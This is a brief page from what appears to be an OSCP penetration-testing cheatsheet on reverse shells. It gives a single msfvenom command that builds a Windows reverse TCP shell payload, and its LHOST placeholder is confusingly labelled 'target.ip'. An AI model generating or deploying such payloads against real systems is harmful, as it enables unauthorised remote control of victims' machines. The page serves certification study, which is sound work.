> For the complete documentation index, see [llms.txt](https://oscp.cyberdefendersprogram.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.cyberdefendersprogram.com/cheatsheet-commands/reverse-shells.md).

# reverse-shells

## using msfvenom

```
msfvenom -p windows/shell/reverse_tcp LHOST=target.ip LPORT=80 --platform windows -a x64
```
